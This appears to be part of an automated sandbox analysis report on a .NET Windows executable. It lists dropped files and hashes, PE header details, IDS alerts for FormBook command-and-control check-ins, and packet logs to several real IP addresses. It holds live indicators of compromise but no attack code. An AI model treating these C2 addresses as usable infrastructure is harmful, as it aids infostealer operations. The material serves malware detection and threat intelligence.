SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.373542133114969
Encrypted:	false
SSDEEP:	48:wWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:wLHyIFKL3IZ2KRH9Oug8s
MD5:	BB6F8ECE678CE5E5DFFF02C1FFBCC18D
SHA1:	0041A200E737D7E6CB264699BD2ED56AC6AAF3E6
SHA-256:	C423C790692D4F2F1BCCD025D11D9833CC29DE7A622630EB9FCA7902F30B323E
SHA-512:	5D37CFC6CAFAF77E630C55CB1E94F4437F25E2A0B2027395BB8D6AD7B726FBE9B3D7AEF9325A253C4085AD00C4ADB8EA7CBAD767101287A3B282FB370AE1326F
Malicious:	false
Preview:	@...e.................................&.D.......................P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\-631756

Download File

Process:	C:\Windows\SysWOW64\DpiScaling.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gq0dfbrt.kko.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ot3dry14.mb0.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yd15ss1l.gvs.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ypvtc4cg.gy5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.731524478379101
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	4p5XLVXJnq.exe
File size:	837'632 bytes
MD5:	a2e835771815bdcf402a788b18068adb
SHA1:	47c2089eb930880d799e8725d05ab0150194c272
SHA256:	9bf03ba46e371b24b335b830235845ceb42b215d414eca1aeb91c4d4303da999
SHA512:	0db54baa4fde41bb640d41963baa17c6f943de4aab2651c1aad31bd32d8db0f3f7e9e273c8ff2ff93f0b1a6f559cbaf0209de961d2d93c0e965ef7a7ed295ffc
SSDEEP:	12288:sKR9b4YbiwyF+gzdq6RuerfYXvi+Pz3LQ80+3VLzP5aESZRIMgCFw9:nX/sq60erfYX/TLQD+raESZiMgew
TLSH:	A90501342E49C507C45C6A740972F2BA0BB89F9BB001E7175FDA7DFBBE22A4608159D3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...kjkg..............0.................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4cdd16
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x676B6A6B [Wed Dec 25 02:14:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007FEE5535F2F2h
je 00007FEE5535F2F2h
add byte ptr [ebp+00h], ch
add byte ptr [edx+00h], dl
add byte ptr [esi+00h], ah
insb
add byte ptr [ebp+00h], ah
arpl word ptr [eax], ax
je 00007FEE5535F2F2h
imul eax, dword ptr [eax], 006E006Fh
add byte ptr [ecx+00h], al
jnc 00007FEE5535F2F2h
jnc 00007FEE5535F2F2h
add byte ptr [ebp+00h], ch
bound eax, dword ptr [eax]
insb
add byte ptr [ecx+00h], bh
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
add byte ptr [edi+00h], ch
popad
add byte ptr [eax+eax+00h], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcdcc4	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xce000	0x51c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xcbd5c	0xcbe00	e5acdc517dd458fb3c2380964d9831b0	False	0.8945444225168608	data	7.739346584194937	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xce000	0x51c	0x600	61485b68f905a9e0097d510f1e63bedf	False	0.3587239583333333	data	2.9272105987881387	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd0000	0xc	0x200	84bfd8c8970b868361622abf71225dc6	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xce058	0x4c0	data			0.42269736842105265

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T05:43:07.599898+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49980	176.57.65.76	80	TCP
2025-01-11T05:43:10.145454+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49981	176.57.65.76	80	TCP
2025-01-11T05:43:12.788716+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49982	176.57.65.76	80	TCP
2025-01-11T05:43:20.831673+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49985	199.59.243.228	80	TCP
2025-01-11T05:43:23.394009+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49986	199.59.243.228	80	TCP
2025-01-11T05:43:25.931120+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49987	199.59.243.228	80	TCP
2025-01-11T05:43:42.146640+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49989	209.74.79.40	80	TCP
2025-01-11T05:43:44.699994+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49990	209.74.79.40	80	TCP
2025-01-11T05:43:47.262807+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49991	209.74.79.40	80	TCP
2025-01-11T05:43:55.555084+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49993	136.243.225.5	80	TCP
2025-01-11T05:43:58.109064+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49994	136.243.225.5	80	TCP
2025-01-11T05:44:00.651628+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49995	136.243.225.5	80	TCP
2025-01-11T05:44:09.091283+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49997	185.68.108.243	80	TCP
2025-01-11T05:44:11.638921+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49998	185.68.108.243	80	TCP
2025-01-11T05:44:14.183488+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	49999	185.68.108.243	80	TCP
2025-01-11T05:44:23.057330+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50001	134.122.135.48	80	TCP
2025-01-11T05:44:25.640046+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50002	134.122.135.48	80	TCP
2025-01-11T05:44:28.175216+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50003	134.122.135.48	80	TCP
2025-01-11T05:44:36.427849+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50005	217.160.0.167	80	TCP
2025-01-11T05:44:38.985596+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50006	217.160.0.167	80	TCP
2025-01-11T05:44:41.529827+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50007	217.160.0.167	80	TCP
2025-01-11T05:44:58.556678+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.5	50009	104.21.64.1	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 05:42:51.027816057 CET	49979	80	192.168.2.5	194.245.148.189
Jan 11, 2025 05:42:51.033274889 CET	80	49979	194.245.148.189	192.168.2.5
Jan 11, 2025 05:42:51.036415100 CET	49979	80	192.168.2.5	194.245.148.189
Jan 11, 2025 05:42:51.046835899 CET	49979	80	192.168.2.5	194.245.148.189
Jan 11, 2025 05:42:51.052510023 CET	80	49979	194.245.148.189	192.168.2.5
Jan 11, 2025 05:42:51.660022020 CET	80	49979	194.245.148.189	192.168.2.5
Jan 11, 2025 05:42:51.660098076 CET	80	49979	194.245.148.189	192.168.2.5
Jan 11, 2025 05:42:51.660131931 CET	80	49979	194.245.148.189	192.168.2.5
Jan 11, 2025 05:42:51.660166025 CET	80	49979	194.245.148.189	192.168.2.5
Jan 11, 2025 05:42:51.660346985 CET	49979	80	192.168.2.5	194.245.148.189
Jan 11, 2025 05:42:51.665586948 CET	49979	80	192.168.2.5	194.245.148.189
Jan 11, 2025 05:42:51.670408964 CET	80	49979	194.245.148.189	192.168.2.5
Jan 11, 2025 05:43:06.915447950 CET	49980	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:06.920479059 CET	80	49980	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:06.920608044 CET	49980	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:06.934928894 CET	49980	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:06.939928055 CET	80	49980	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:07.599719048 CET	80	49980	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:07.599773884 CET	80	49980	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:07.599898100 CET	49980	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:08.449124098 CET	49980	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:09.467993021 CET	49981	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:09.473416090 CET	80	49981	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:09.473510027 CET	49981	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:09.488677025 CET	49981	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:09.493554115 CET	80	49981	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:10.145284891 CET	80	49981	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:10.145339012 CET	80	49981	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:10.145453930 CET	49981	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:10.145982981 CET	80	49981	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:10.146035910 CET	49981	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:10.996217966 CET	49981	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:12.014878988 CET	49982	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:12.019907951 CET	80	49982	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:12.022828102 CET	49982	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:12.038273096 CET	49982	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:12.043175936 CET	80	49982	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:12.043328047 CET	80	49982	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:12.788621902 CET	80	49982	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:12.788652897 CET	80	49982	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:12.788665056 CET	80	49982	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:12.788716078 CET	49982	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:13.543019056 CET	49982	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:14.561657906 CET	49984	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:14.566631079 CET	80	49984	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:14.566745043 CET	49984	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:14.578758955 CET	49984	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:14.583652020 CET	80	49984	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:15.266638041 CET	80	49984	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:15.266661882 CET	80	49984	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:15.266858101 CET	49984	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:15.267378092 CET	80	49984	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:15.268795967 CET	49984	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:15.269629955 CET	49984	80	192.168.2.5	176.57.65.76
Jan 11, 2025 05:43:15.274507046 CET	80	49984	176.57.65.76	192.168.2.5
Jan 11, 2025 05:43:20.349304914 CET	49985	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:20.354254961 CET	80	49985	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:20.357003927 CET	49985	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:20.377880096 CET	49985	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:20.382762909 CET	80	49985	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:20.831521988 CET	80	49985	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:20.831548929 CET	80	49985	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:20.831562996 CET	80	49985	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:20.831672907 CET	49985	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:21.886812925 CET	49985	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:22.905590057 CET	49986	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:22.910464048 CET	80	49986	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:22.910712004 CET	49986	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:22.925904989 CET	49986	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:22.930748940 CET	80	49986	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:23.393897057 CET	80	49986	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:23.393950939 CET	80	49986	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:23.394009113 CET	49986	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:23.394016981 CET	80	49986	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:23.394082069 CET	49986	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:24.433825016 CET	49986	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:25.452575922 CET	49987	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:25.457488060 CET	80	49987	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:25.457659006 CET	49987	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:25.472826958 CET	49987	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:25.477758884 CET	80	49987	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:25.477900982 CET	80	49987	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:25.931045055 CET	80	49987	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:25.931076050 CET	80	49987	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:25.931096077 CET	80	49987	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:25.931119919 CET	49987	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:25.931159019 CET	49987	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:26.980722904 CET	49987	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:27.999645948 CET	49988	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:28.004914045 CET	80	49988	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:28.005160093 CET	49988	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:28.017335892 CET	49988	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:28.022270918 CET	80	49988	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:28.456906080 CET	80	49988	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:28.456935883 CET	80	49988	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:28.456950903 CET	80	49988	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:28.457112074 CET	49988	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:28.457155943 CET	49988	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:28.459927082 CET	49988	80	192.168.2.5	199.59.243.228
Jan 11, 2025 05:43:28.464971066 CET	80	49988	199.59.243.228	192.168.2.5
Jan 11, 2025 05:43:41.553776026 CET	49989	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:41.559267998 CET	80	49989	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:41.559398890 CET	49989	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:41.575197935 CET	49989	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:41.581475019 CET	80	49989	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:42.146480083 CET	80	49989	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:42.146498919 CET	80	49989	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:42.146640062 CET	49989	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:43.090447903 CET	49989	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:44.109266043 CET	49990	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:44.114222050 CET	80	49990	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:44.114300966 CET	49990	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:44.129921913 CET	49990	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:44.134752989 CET	80	49990	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:44.699860096 CET	80	49990	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:44.699886084 CET	80	49990	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:44.699994087 CET	49990	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:45.637244940 CET	49990	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:46.656174898 CET	49991	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:46.661140919 CET	80	49991	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:46.663450003 CET	49991	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:46.678530931 CET	49991	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:46.683383942 CET	80	49991	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:46.683474064 CET	80	49991	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:47.262698889 CET	80	49991	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:47.262733936 CET	80	49991	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:47.262806892 CET	49991	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:48.184179068 CET	49991	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:49.202810049 CET	49992	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:49.208797932 CET	80	49992	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:49.208928108 CET	49992	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:49.219041109 CET	49992	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:49.224931955 CET	80	49992	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:49.812041044 CET	80	49992	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:49.812155962 CET	80	49992	209.74.79.40	192.168.2.5
Jan 11, 2025 05:43:49.812434912 CET	49992	80	192.168.2.5	209.74.79.40
Jan 11, 2025 05:43:49.814999104 CET	49992	80	192.168.2.5	209.74.79.40
